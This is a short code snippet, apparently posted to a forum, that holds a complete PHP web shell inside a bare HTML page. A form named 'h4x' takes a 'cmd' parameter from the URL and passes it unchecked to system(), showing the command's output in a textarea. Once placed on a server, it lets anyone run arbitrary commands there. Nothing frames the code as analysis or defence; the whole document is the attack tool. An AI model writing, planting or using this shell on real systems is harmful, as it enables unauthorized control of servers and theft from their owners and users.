Code:
<html><body bgcolor="#000000">
<form name="h4x" action="" method="GET">
<textarea cols="100" rows="40"><?php $_GET['cmd'] ? system($_GET['cmd']) : system("cd /"); ?></textarea><br />
<input type="text" name="cmd" value="" size="99">
</form>
</body>
</html>